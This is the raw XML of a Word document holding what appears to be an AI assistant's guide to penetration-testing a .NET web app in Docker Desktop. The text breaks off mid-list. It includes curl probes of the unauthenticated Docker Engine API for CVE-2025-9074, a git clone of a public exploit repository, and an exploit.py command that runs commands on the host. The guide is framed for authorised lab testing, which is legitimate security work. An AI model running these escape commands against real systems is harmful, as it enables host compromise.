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BCDD5">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Pentest .net web app deployed in docker desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04444138">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Read 10 web pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4986B6D8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Penetration testing a .NET web application running in Docker Desktop requires a dual focus: you need to assess both the security of the application's code and the security of its container runtime environment. Docker Desktop introduces unique layers, such as potential API exposure and volume mounts, that are not typically present in standard IIS or Kestrel deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50214A78">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Here is a strategic roadmap and a series of practical commands to guide your testing process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2832BACE">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Strategic Testing Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D35492D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Begin by mapping the attack surface. Identify running containers, their networking configuration, open ports, and environment variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4045231B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Container Escape (Runtime)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">: Check for critical Docker Desktop vulnerabilities (like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>CVE-2025-9074</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>) that allow breaking out of the container to the host system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3760A1E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Application Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Perform a traditional web penetration test on the .NET application (scanning for SQLi, XSS, etc.) using tools like OWASP ZAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F94ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Configuration Review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Audit Dockerfiles and docker-compose.yml for security misconfigurations such as running as root or storing secrets in plain text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69710D8E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1025" o:spt="1" style="height:1.5pt;width:0pt;" fillcolor="#A0A0A0" filled="t" stroked="f" coordsize="21600,21600" o:hr="t" o:hrstd="t">
            <v:path/>
            <v:fill on="t" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata o:title=""/>
            <o:lock v:ext="edit"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:rect>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3121E90A">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1: Assessing Container Runtime Security (Escape to Host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF5E00C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">This phase focuses on the connection between your container and the host machine. A critical vulnerability to check for is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>CVE-2025-9074</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA12E22">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>The Vulnerability (CVE-2025-9074)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are using Docker Desktop for Windows or macOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>version &lt; 4.44.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>, a container can access the Docker Engine API without authentication. An attacker who compromises your .NET web app can use this to create a new, privileged container to read files and execute commands on your host machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6573BF44">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Check if you are vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D89B8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this command from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>inside your running .NET container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F190E8A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4FB4E5">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Test if the unauthenticated API is reachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDBC3A2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>curl http://192.168.65.7:2375/version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CECDCDE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E20145">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Alternative for Windows hosts (WSL2 backend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A579EFE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>curl http://host.docker.internal:2375/version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7B3177">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>If you receive a JSON version response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Your environment is exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37258F1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>If the connection fails or times out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Your environment is likely safe from this specific vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EFAF5D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Simulate the Exploit (Proof of Concept)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427513D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>If you want to test this in a lab environment, you can use a Python script to verify the escape path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13644B75">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AF871F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># 1. Download the exploit PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDF6BE8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>git clone https://github.com/PtechAmanja/CVE-2025-9074-Docker-Desktop-Container-Escape.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B6D3C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>cd CVE-2025-9074-Docker-Desktop-Container-Escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA7B5A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39BAFC8B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># 2. Execute a command on the Host (e.g., list C:\ drive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557739F6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/c/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F7678F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Note: This should only be performed on systems you own or have explicit permission to test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034CC6F3">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2: Web Application Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3378FE44">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Once you confirm the container is not trivially escapable, or after you have escaped, you must test the .NET application logic itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BF5411">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Automated Scanning with OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E08E718">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">This is your standard web app test. Look for SQL Injection, Cross-Site Scripting (XSS), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Broken Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5696522B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Run ZAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Ensure ZAP is installed on your host machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB1C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Import API Definition (Swagger/OpenAPI)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Most modern .NET apps expose a Swagger endpoint (/swagger/v1/swagger.json). This gives ZAP a complete map of your API to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D8B5C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">In ZAP, go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Import &gt; OpenAPI Definition from URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC22892">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Enter your Swagger URL (e.g., https://localhost:7001/swagger/v1/swagger.json).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429B595B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Handle Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: If your app uses JWT tokens, you need to configure ZAP to include the Authorization header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBFDC9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Option A (Scripting)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Load a "HTTP Sender" script that automatically grabs a token and adds it to every request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F43BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Option B (Session)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Manually log in via ZAP's browser to capture the session cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78564ED2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
